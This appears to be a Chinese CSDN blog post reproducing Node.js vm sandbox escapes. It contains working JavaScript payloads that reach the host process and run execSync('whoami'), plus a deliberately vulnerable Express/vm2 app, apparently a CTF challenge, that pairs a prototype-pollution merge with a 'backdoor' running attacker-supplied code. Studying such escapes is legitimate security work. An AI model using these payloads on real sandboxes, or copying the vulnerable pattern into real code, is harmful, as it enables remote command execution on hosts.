沙箱逃逸复现

最新推荐文章于 2024-05-17 16:27:00 发布
最新推荐文章于 2024-05-17 16:27:00 发布
阅读量357 收藏
点赞数
文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/upmans/article/details/130296004
版权

 当this指向window

原理

        1.this直接指向window,拿到window的tostring的constructor来利用构造函数拿到process

                是对象且指向沙箱外部,才可以利用

const vm = require('vm');
const script = `
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()
`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

 当this指向null,且没有其他对象可用
               使用arguments.callee.caller在沙盒内定义一个函数并返回,让外部对象调用这个函数,此时arguments.callee就是该对象了,然后再用constructor利用构造函数拿到process

                arguments.callee就是调用函数本身(可以理解成等于函数本身,但没有指向)

                arguments.caller就是指谁调用了自己(指向一个函数)

                arguments.callee.caller就是指向了某个调用自己的方法,这样就可以通过处在沙箱外的这个方法的构造函数拿到process了

    1.
        此时要触发这个tostring方法,就需要沙箱外有执行字符串的相关操作,

        可以console.log('hello' + res),来利用拼接的方式让res变成一个字符串

        因为在js中,例如this、对象等和字符串拼接都会自动调用tostring方法然后变成一个字符串 

        就触发了tostring方法
const vm = require('vm');
const script =`(() => {  
  const a = {}  
  
  a.toString = function () {    
  
  const cc = arguments.callee.caller;    
  
  const p = (cc.constructor('return process'))();   
  
   return p.mainModule.require('child_process').execSync('whoami').toString()  
  
  }  
  
  return a })()`;
const sandbox = { m: {}, n: 2, x: /regexp/};
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log('hello'+res);

 漏洞复现

const express = require('express');
const app = express();
const { VM } = require('vm2');
 
app.use(express.json());
 
const backdoor = function () {
    try {
        new VM().run({}.shellcode);
    } catch (e) {
        console.log(e);
    }
}
 
const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}
const clone = (a) => {
    return merge({}, a);
}
 
 
app.get('/', function (req, res) {
    res.send("POST some json shit to /.  no source code and try to find source code");
});
 
app.post('/', function (req, res) {
    try {
        console.log(req.body)
        var body = JSON.parse(JSON.stringify(req.body));
        var copybody = clone(body)
        if (copybody.shit) {
            backdoor()
        }
        res.send("post shit ok")
    }catch(e){
        res.send("is it shit ?")
        console.log(e)
    }
})
 
app.listen(3000, function () {
    console.log('start listening on port 3000');
}); 

 

upmans
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vm2沙箱逃逸漏洞(CVE-2023-32314)
0xSec
05-19 2453
3.9.17 及以下版本的vm2中存在沙盒逃逸漏洞。它滥用基于代理规范的宿主对象的意外创建,并允许Function在宿主上下文中通过 导致RCE。
沙箱逃逸技术总结
09-11
沙箱逃逸技术总结。
Python沙箱逃逸总结
forbidd3n,keep going
07-26 1951
0x00 简介 关于Python沙箱逃逸,在多次CTF比赛中看到后,终于下定决心来进行一番学习和总结。 python沙箱逃逸:从一个受限制的python执行环境中获取到更高的权限,甚至getshell。 0x01 __builtins__ 首先我们从python的内建函数__builtins__说起。通过dir(__builtins__)可以查看内置函数,展示所有内置类型和函数。 ...
沙箱逃逸漏洞
qq_52178594的博客
08-06 159
沙箱就是能够像一个集装箱一样,把你的应用“装”起来的技术。这样,应用与应用之间,就因为有了边界而不至于相互干扰而被装进集装箱的应用,也可以被方便地搬来搬去。
沙箱逃逸漏洞
weixin_64879549的博客
08-03 686
沙箱逃逸漏洞
Flask SSTI/沙箱逃逸的一些总结
0xdawn的博客
03-18 1073
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱沙箱在早期主要用于测试可疑软件、病毒危害程度等。在沙箱中运行,即使病毒对其造成严重危害,也不会威胁到真实环境。类似于虚拟机的利用。 内建函数 ​ 当启动python解释器...
vm2 组件存在沙箱逃逸漏洞
OSCS开源安全社区
09-07 1164
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。同时提供漏洞、投毒情报的免费订阅服务,社区用户可通过配置飞书、钉钉、企业微信机器人,及时获得一手情报信息推送。点击漏洞详情页右下方【免费使用】,即可快速体验墨菲安全专业的检测能力。提供代码安全检测、许可证合规评估等能力,目前支持 CLI 、IDE插件、GitHub多种检测方式,欢迎使用。受影响版本的 vm2 中,攻击者可以绕过沙箱的保护,在沙箱运行的主机上获得远程代码执行的权限。
漏洞实 --- Vm2沙箱逃逸漏洞(CVE-2023-32314)
weixin_62443409的博客
09-13 4776
安装低版本npm是为了规避npm的内部审核机制(高版本npm会检查vm2安装包的安全性)CentOS7(Nodejs和[email protected])升级nodejs至高版本。
php 沙箱逃逸,PHP Smarty模版代码注入漏洞(CVE-2021-26120)
weixin_42317626的博客
03-28 1061
0x00漏洞概述CVE IDCVE-2021-26120时 间2021-02-26类 型代码注入等 级高危远程利用是影响范围PHP Smarty < 3.1.390x01漏洞详情Smarty是通过PHP开发的模板引擎,它分开了PHP逻辑代码与外观(HTML页)以便于管理。近日,PHP Smarty被披露存在2个PHP代码注入漏洞(CVE-2021-26120和CVE-2021-...
沙箱逃逸和竞争性漏洞
vt_yjx的博客
08-03 138
空对象里有一个shellcode属性,在上面我们已经可以污染空对象的原型了,那就继续添加一个shellcode属性,值就要逃逸沙箱了,可以使用import来动态导入对象。arguments.callee.caller就是指向了某个调用自己的方法,这样就可以通过处在沙箱外的这个方法的构造函数拿到process了。根据源码显示,body又是用户输入的,然后利用clone函数里的merge结合赋给一个空对 象,那么就可以污染空对象的原型,加上一个shit属性值为1.是对象且指向沙箱外部,才可以利用。
沙箱逃逸:来自安全软件的鼎力相助.pdf
08-07
沙箱已经成为代安全技术的重要组成部分。Microsoft Windows 8.1 和 Windows 10 集成了若干新的缓解措施和安全边界,显著提升了应用层沙箱的安全性,降低了代码执行漏洞所造成的直接危害。然而第三方软件也是 ...
沙箱逃逸技术总结.ppt
07-25
无论是哪种沙箱技术,总归无法和真实环境比拟,所以沙箱逃避技术在高级别病毒样本已经普遍存在,并且逃避技术也在逐渐更新。 下面总结下当前的逃避技术,我分为两个特点进行分析。 ·针对虚拟机检测 ·针对沙箱分析...
沙箱逃逸练习题python源码
02-13
里面是近十道python逃逸题目的python源码,在python环境中运行既可以进入题目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
力控7.2与宏电通过内网连接UDP+DDP
xkyby1992的专栏
05-17 686
本文主要介绍力控7.2与宏电通过内网连接UDP+DDP的指导文档
netstat协议
lovemelovefish的博客
05-15 370
本机各端口的网络连接情况。
Linux:网络管理命令之ss
最新发布
hhd1988的专栏
05-17 481
Linux:网络管理命令之ss
Kubernetes——CNI网络组件
一坨小橙子的博客
05-14 633
Kubernetes三种接口、三种网络、VLAN和VXLAN、CNI网络插件(Flannel与Calico)
nodejs沙箱逃逸
09-11
node.js沙箱逃逸是指攻击者利用特定的漏洞或技术手段,成功越过node.js沙箱限制,实对主机环境的非法操作或访问。在node.js中,沙箱被用来隔离有害程序,防止其影响到主机环境。通过沙箱,可以将程序与程序之间、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值